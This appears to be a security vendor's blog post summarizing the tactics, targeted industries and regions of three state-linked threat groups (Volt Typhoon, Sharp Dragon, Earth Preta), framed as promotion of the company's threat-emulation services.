The cybersecurity landscape continues to evolve, with threat actors targeting critical infrastructure, government entities, and industries worldwide. SCYTHE’s emulation and analysis of these threats provide invaluable insights to strengthen defenses. Below, we highlight some of the most pressing threats we’ve tackled this year, detailing their tactics, the industries impacted, and the regions they target.
Volt Typhoon represents a significant threat, as identified by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI). These attacks are attributed to state-sponsored cyber actors from the People's Republic of China (PRC). Volt Typhoon’s campaign focuses on infiltrating IT networks to pre-position malicious actors, intending to disrupt or potentially destroying critical infrastructure—a strategy aligned with geopolitical tensions or military conflicts.
Key Tactics:
Living off the land binaries and scripts (LOLBAS) to avoid detection
Exploiting valid accounts for persistence
Maintaining long-term intrusions, some undetected for over five years
Targeted Industries:
‣ Energy
‣ Communications
‣ Transportation Systems
‣ Water and Wastewater Systems
Targeted Regions/Countries:
‣ United States
‣ Australia
‣ Canada
‣ Guam
‣ New Zealand
By emulating these tactics, SCYTHE equips organizations to identify vulnerabilities and mitigate risks posed by such advanced campaigns.
Sharp Dragon, a Chinese threat actor, primarily targets government entities to gain initial access and facilitate lateral movement. By compromising trusted organizations, Sharp Dragon amplifies its impact, infiltrating systems across multiple regions.
Key Tactics:
Exploiting trust in compromised governmental networks
Lateral movement to extend access
Sophisticated phishing campaigns
Targeted Industries:
‣ Government
Targeted Regions/Countries:
‣ Southeast Asia
‣ Africa
‣ Caribbean
SCYTHE’s simulations of Sharp Dragon’s tactics emphasize the importance of securing inter-organizational trust relationships and monitoring for subtle anomalies in system behavior.
Earth Preta (also known as Mustang Panda or Stately Taurus) continues to refine its techniques, targeting educational, research, and governmental institutions. This group focuses on the Pacific region, employing novel tools, upgraded malware, and creative attack vectors.
Key Tactics:
Utilizing removable drives like BADUSB or FlipperZero for initial access
Persistence through registry modifications, Run keys, and scheduled tasks
Exfiltration via FTP using curl
Deployment of custom DLLs for command-and-control (C2) communication
Targeted Industries:
‣ Government
‣ Non-Profits
‣ Religious Organizations
Targeted Regions/Countries:
‣ Japan
‣ Australia
‣ Myanmar
‣ Mongolia
‣ Vietnam
‣ Pakistan
‣ United States
SCYTHE’s emulation campaigns model these behaviors to help organizations bolster defenses against emerging tactics.
Threat actors like Volt Typhoon, Sharp Dragon, and Earth Preta highlight the evolving risks faced by critical infrastructure and industries worldwide. By analyzing and emulating these campaigns, SCYTHE empowers organizations to prepare for the threats of tomorrow. Stay tuned for our upcoming Threat Thursday Live sessions, where we’ll dive deeper into emerging risks and the strategies needed to counter them.